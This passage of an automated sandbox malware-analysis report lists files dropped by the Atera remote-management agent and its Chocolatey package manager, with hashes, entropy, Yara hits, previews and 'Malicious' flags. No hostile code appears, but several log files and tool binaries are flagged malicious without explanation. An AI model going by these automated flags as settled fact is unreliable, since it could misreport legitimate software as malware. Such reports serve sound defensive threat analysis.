                                                                                                                                                                                                                                        SHA1:DE2F3649ABE435CB36DB125C8B9676C2006D47CE
                                                                                                                                                                                                                                        SHA-256:E76060485F0419FF7C5FF18CC37157F6AF6014FC8D8AED7B486A3B51A410FCEE
                                                                                                                                                                                                                                        SHA-512:3776A25B4DF18ED2D07C4C4254D436AD73B9261D055EDD10976F8CA4AFF9B2454E6E5356288B1E6F94A572574C2FA1E57E7D354E718E5940C99744D56AF48350
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:fc7a5ab8c8a580d3eef4fe04c8c901f6
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):280624
                                                                                                                                                                                                                                        Entropy (8bit):5.691550591631762
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:tG0WgexKpGi8PnJcerXUaxX3HVeES4BEIqTTpX/4ormGpnaVTSGCkMhkEn7GAhCb:tJrycoB3HVeESME3pnaVTS1nh7hCai
                                                                                                                                                                                                                                        MD5:39757BEFD8F82DB569267A45A83C6AA5
                                                                                                                                                                                                                                        SHA1:6F02630FBBE19E9594547B2FA3C5AD1E065AA86B
                                                                                                                                                                                                                                        SHA-256:F72C68CBAC83753453AD41340CB7E191CB9897E0E99EB3274D9C6EFAE6EBD6C7
                                                                                                                                                                                                                                        SHA-512:BC451FD46997B558AEBFB1E793D9ED5E076089FA9BF7EEA15B13472179165DC7211D5554C69D78B4011168A766943E7FB4470BE50EC6990239F70DF20E3577C9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1018
                                                                                                                                                                                                                                        Entropy (8bit):5.296054348194499
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:kfRVR897gfr/Vf9fVR897gfGdfIVR897gfXdo+fo68fVNVifFoZFe:WRn8ha5Zn8haGdIn8ha35OVNV8FkM
                                                                                                                                                                                                                                        MD5:088558E49B8E515E8658DB653AEA725F
                                                                                                                                                                                                                                        SHA1:1D6C02B58F0DA554419EC287C9A6A39D69EF4189
                                                                                                                                                                                                                                        SHA-256:766BCC7FB3FB7FD0E633F53E8D7732D3943195B3653BE6B9B98B7A3C36E9E5D4
                                                                                                                                                                                                                                        SHA-512:9536D58EE6A4C156D05869ACB5519CD1FF4618A12821106244B0F3CD23F0960E86FA9A779A948C03E502C657119C0FF71EAA2D97C425511D1CF0FDB8DB241518
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\choco.summary.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-10-02 11:20:34,728 8132 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-10-02 11:20:35,212 8132 [WARN ] - Enabled allowGlobalConfirmation..2024-10-02 11:20:35,321 8132 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-10-02 11:20:35,931 8132 [WARN ] - 0 packages installed...2024-10-02 11:20:36,165 8132 [WARN ] - Directory 'C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\lib' does not exist...2024-10-02 11:20:36,962 8132 [INFO ] - Outdated Packages.. Output is package name | current version | available version | pinned?....2024-10-02 11:20:37,368 8132 [WARN ] - ..Chocolatey has determined 0 package(s) are outdated. ..2024-10-02 11:20:37,384 8132 [WARN ] - ..Enjoy using Chocolatey? Explore more amazing features to take your..experience to the next level at.. https://chocol
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):19791
                                                                                                                                                                                                                                        Entropy (8bit):5.4121867192338025
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:i3C5CzzhdItHcAQl3C5CzzhdftH4Aa1C5CzzydftH4ASL:i3C5Czzxl3C5CzzO1C5Czzh
                                                                                                                                                                                                                                        MD5:0C4DF41C95531263D702DEA37CE948D5
                                                                                                                                                                                                                                        SHA1:BEEC2E9A235D85E6E796AEA16C8E0A421FD358C2
                                                                                                                                                                                                                                        SHA-256:64AC7CE571CB804424E6F11C256643775161F12B9CB5717D6EAC4768EA13B791
                                                                                                                                                                                                                                        SHA-512:F6C330490532836693380D11A079A46C5E6B102768A08F8A8FDB44ACE4D0B4E8A5CBAD697C623156093343E0FB80F1669699E560A0AC8F5D26EFE72023E89832
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\logs\chocolatey.log, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:2024-10-02 11:20:28,759 8132 [DEBUG] - XmlConfiguration is now operational..2024-10-02 11:20:28,962 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers"...2024-10-02 11:20:29,165 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\helpers\functions"...2024-10-02 11:20:30,712 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects"...2024-10-02 11:20:30,759 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools"...2024-10-02 11:20:31,743 8132 [DEBUG] - Attempting to create directory "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\config"...2024-10-02 11:20:34,165 8132 [DEBUG] - Attempting to create direc
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3788), with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3788
                                                                                                                                                                                                                                        Entropy (8bit):5.5930524808142525
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:23atiy3IU5ghNMDulMHMdl/HM7l/H0trAI8e6hmri:23atiy3F5gHkulMHsdH+dH0FAe6hmri
                                                                                                                                                                                                                                        MD5:5ED162248B5F6B18ABE1583A440153A9
                                                                                                                                                                                                                                        SHA1:8780E4091DB000D692742E0BBF15D5CC60053333
                                                                                                                                                                                                                                        SHA-256:191FB1991A205F0BFFBF0113BBED953B712DFAE31D072A24BD85466765DF10EE
                                                                                                                                                                                                                                        SHA-512:94AB69A8C6424D4815AD04FC87D3EEAEC2BBE1494CD86FD0BBFB6E3856B1C28EEC2B85AE59E989825F4EDFDF848224869F948B50F100E02D7D2BEABD177191A9
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2340
                                                                                                                                                                                                                                        Entropy (8bit):5.120693108028518
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:WJhzy3v9zec4JksG5A10JZ65RhS9JlqUp7B9nplD6e7B5yg:42V6Q5A1B5C9L/
                                                                                                                                                                                                                                        MD5:B4326546C3A252494DCD512976F8B89A
                                                                                                                                                                                                                                        SHA1:09D10EA0ABDBDE8C2B5BAFE410ED3B96AB0076C8
                                                                                                                                                                                                                                        SHA-256:9B251737A6B6ACE9FDE45B64FD653B04575C6416F15112FBE1697A47B14990E6
                                                                                                                                                                                                                                        SHA-512:E58EDC6DC66A289358E7FDE7C3F1D73A0EE1F7A6DB382DD1318FAA205E12271C081617B8366ECD1FCB3A0BC5A98F4B0F0C389C99A63D9EDF7CE1BD230AC85EC2
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:@echo off..::..:: RefreshEnv.cmd..::..:: Batch file to read environment variables from registry and..:: set session variables to these values...::..:: With this batch file, there should be no need to reload command..:: environment every time you want environment changes to propagate....::echo "RefreshEnv.cmd only works from cmd.exe, please install the Chocolatey Profile to take advantage of refreshenv from PowerShell"..echo | set /p dummy="Refreshing environment variables from registry for cmd.exe. Please wait..."....goto main....:: Set one environment variable from registry key..:SetFromReg.. "%WinDir%\System32\Reg" QUERY "%~1" /v "%~2" > "%TEMP%\_envset.tmp" 2>NUL.. for /f "usebackq skip=2 tokens=2,*" %%A IN ("%TEMP%\_envset.tmp") do (.. echo/set "%~3=%%B".. ).. goto :EOF....:: Get a list of environment variables from registry..:GetRegEnv.. "%WinDir%\System32\Reg" QUERY "%~1" > "%TEMP%\_envget.tmp".. for /f "usebackq skip=2" %%A IN ("%TEMP%\_envget.tmp") do (
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):136704
                                                                                                                                                                                                                                        Entropy (8bit):5.174853806484254
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:ED98HpKI6GCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:Y9GpKbShcHUa
                                                                                                                                                                                                                                        MD5:DDD072DBD2267BCB3081340E57ED092B
                                                                                                                                                                                                                                        SHA1:04EC398A1DE53DC960A882363A528E162350C57C
                                                                                                                                                                                                                                        SHA-256:460F604144DD93A3794F75C9E09B2676D7AD1295CD92499FAD80ED3C27990F02
                                                                                                                                                                                                                                        SHA-512:2271C5846254EAA7389D23EE0241814D06D34257A7B6D44FE7CBEA14F3ACA5101457FAD934B22D2B9B49F1263BCB4209D8EADC07DB93E2B5E01CCDA5BD6ED2A8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162895637606263
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:KMU90HpKOrGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:K59OpKgShcHUa
                                                                                                                                                                                                                                        MD5:0BCC21AC34291B167EC4D73079EAE085
                                                                                                                                                                                                                                        SHA1:BAEF2A7349E2C6269BBF2C8C6654C492683FC73E
                                                                                                                                                                                                                                        SHA-256:14288199533B10CAD97F5917447979BBC4685F20255AA073EC1BB828D3CF6A2C
                                                                                                                                                                                                                                        SHA-512:9B7CC423E4F27DFF6006425311A6CC39CBA9CB5D3D4966C81FDA21C5907A434B6A748A92B65229A01A65440D8BA2D87D9E8C99CE80E2062569232A10AE74F9BA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162623164553414
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:1w9mHpKZNGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:C9UpK7ShcHUa
                                                                                                                                                                                                                                        MD5:55CC3EA23C5430BE7B5A75A52157DA18
                                                                                                                                                                                                                                        SHA1:AB1D482F2B5E7E0DAD31EA18B78D5F8EA849B87D
                                                                                                                                                                                                                                        SHA-256:BE0494DC91E38456E22692F3AB1891C56871FB82A83ADFDC58F8F890141ECEC9
                                                                                                                                                                                                                                        SHA-512:C09E0476E2D1F69A878195A4026954C5D74C0B5318254A60ABC5909F00A60CCE86D49D29BBF1ECAE498BCE0C2FD2551EFEF0FE287DAB7EAD2FE573CCC833CF3E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162059784215363
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:YE9tHpKrvGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:795pK7ShcHUa
                                                                                                                                                                                                                                        MD5:4E2DC776C653ADBEBCF5DB16AB53296E
                                                                                                                                                                                                                                        SHA1:290457CFC7EC45A493CCEACD2CA24A47237494C1
                                                                                                                                                                                                                                        SHA-256:2DCB2236BB84AE42F4395E72EC67A22CBE0E68ADA4F80FABD7141B5B3D4E7985
                                                                                                                                                                                                                                        SHA-512:533B424AFD7E5BF831BB72164D91B663A2368D458A3EFFFF7062A15D1AB77585C087FA5A5471D3530CCF30309AC30C35EAA4A9168A350071A64E912E15012311
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162082250130723
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:GI9KHpKHDGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:l9QpKjShcHUa
                                                                                                                                                                                                                                        MD5:76385C4CF0842546103EDD75662BDAD7
                                                                                                                                                                                                                                        SHA1:BC42B5817E6BB3568CC6D7C0BD2B03E8B723024B
                                                                                                                                                                                                                                        SHA-256:67EB4084D0BD361C42FFD7AF025167BAFCE8496A35CA6616945E0942386C6424
                                                                                                                                                                                                                                        SHA-512:BAB9B5AE9B89697A7FA83D0D29A4DB0B777F126EEC8DF3BAE9B009AF9A0D556BB79BF2DCED1D26C7A8E900AC5AA7DDE07CEC334DA6418925F352554383F77EC2
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.163276282537277
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:pS791HpKIqGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:pO9xpKbShcHUa
                                                                                                                                                                                                                                        MD5:5C9628C46256D0F6B14DE2168CBED8CC
                                                                                                                                                                                                                                        SHA1:B7284385B0076623B76EC3FB2398B5EE8F3B9F85
                                                                                                                                                                                                                                        SHA-256:354C3758A1F9E5A39E7292E9CCA353F815358977B3CC9A704BCEAB257AC6C24C
                                                                                                                                                                                                                                        SHA-512:84886CF1632EFA70D8023F99A663E809422DFCC1C566793EF52078551DA105BFF1B2F9D54E197D8CCE53C3C725226635D623D9D539B5BFD4C17C802286EFADB4
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):137216
                                                                                                                                                                                                                                        Entropy (8bit):5.162239721051707
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:TR9vHpKmEGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:F9/pKvShcHUa
                                                                                                                                                                                                                                        MD5:8783ED37D6871AE20E4A65A655788A7E
                                                                                                                                                                                                                                        SHA1:C42F5B032CF27FFC36869C22D5BE0363AC2E5AF4
                                                                                                                                                                                                                                        SHA-256:5AFEF49A1BB85ED16EE7EF08D9ED694F166A9500701728770E50E92978566C5B
                                                                                                                                                                                                                                        SHA-512:1FE424147DBAD7978F0C856D152F3236685C52DBCA5DD6AB7A03E5D1B8A08566FDF4574C4704FBEDF286A4C13B354D771E25D1B725D55578C14E9EAB2D8F9898
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:y:y
                                                                                                                                                                                                                                        MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                        SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                        SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                        SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1167872
                                                                                                                                                                                                                                        Entropy (8bit):6.603432444128302
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:Gxb5vMX35l5UVrIdhcMEKWnttf7eePboHvVxSfOtl:GxbSz5UVrIdhnW1Pc96Otl
                                                                                                                                                                                                                                        MD5:0DCE103B0102ADEC3279797665B7A4AE
                                                                                                                                                                                                                                        SHA1:C121392BAB6DBA8D04BEE89C6B526E8E67650CC8
                                                                                                                                                                                                                                        SHA-256:3DB62076E5FCC897FF29DA47FE4029900A4AD696B395B6FA96ACFF1229444C1D
                                                                                                                                                                                                                                        SHA-512:20F0F02097694579AC8794D56411FBE2D97C47D37794CB52AFDABC9956C0452E8A3BB273ED34E463F31927E29E7E41C0FDDB82FBBE688DD39C4113C00EC91BC9
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):513
                                                                                                                                                                                                                                        Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                        MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                        SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                        SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                        SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):331776
                                                                                                                                                                                                                                        Entropy (8bit):6.512244761259412
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:J5lqo52kDzMYDJSi7+Ni2ER9Vh98+1PrEVhkQf0huIDaLOjm:JMqzBDJkk2ERvT8MPAf/O6
                                                                                                                                                                                                                                        MD5:7187AE605F4DCE14BB23EA2623956335
                                                                                                                                                                                                                                        SHA1:F7C1DF33B875C98F41DCDE24117D89D42D25B7CE
                                                                                                                                                                                                                                        SHA-256:9E2631C19B243C28B0980607CED2540E9447B1166572483475547C1A9DD4AC0E
                                                                                                                                                                                                                                        SHA-512:F64522E2FB6BB61884FE53C34E79B355EFB9EC33C02B2CD67D729AF7D763E7B3873A5C7CE6AC7BB4567E6BCF8C70CADBC66F511E8BB151AB05096A832032BC8F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):513
                                                                                                                                                                                                                                        Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                        MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                        SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                        SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                        SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
